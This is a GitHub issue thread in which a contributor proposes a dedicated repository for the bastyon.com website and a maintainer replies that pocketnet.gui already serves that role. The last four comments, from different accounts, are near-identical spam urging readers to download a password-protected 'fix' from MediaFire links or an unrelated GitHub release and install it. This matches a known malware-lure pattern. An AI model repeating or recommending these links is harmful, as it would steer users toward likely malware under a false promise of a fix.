### ISSUE TITLE
Create GitHub Repository For Bastyon.com Website

### ISSUE THREAD

**Issue by Francewhoa** [pocketnetteam/documentation#3]
## User Story

As a user of https://bastyon.com website I need a quick and easy way to create ticket about https://bastyon.com So that the Bastyon community is notified about challenges unique to this website.

Examples of a challenges which seems related to this website at:
* https://github.com/pocketnetteam/documentation/issues/2
* https://github.com/pocketnetteam/documentation/issues/4

## Suggested Resolution

This is a suggestion for your review for interest and for your decision

I suggest this:
* Create new repository owned by https://github.com/pocketnetteam with name: `bastyon-website`
* Activate only this repository `Issues`

Any volunteer for creating this new repository? Both me and the Ubertus.org team would be happy, as volunteer, to contribute testing and documentation, if needed.

Cheers, 

Francois

**Comment by andyoknen** [comment]
Hi! I understand the need for this practice, but in fact the repository for bastyon.com is this repository - https://github.com/pocketnetteam/pocketnet.gui

The name is not quite appropriate, but reflects the essence of the project, since bastyon.com it is not just a website, but a full-fledged application, the code of which is also used to build desktop and mobile versions.

It is more correct to fix problems with IndaCoin in the pocketnet.core repository, since backend developers work more closely with the IndaCoin team ;)

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by 64dB0y** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
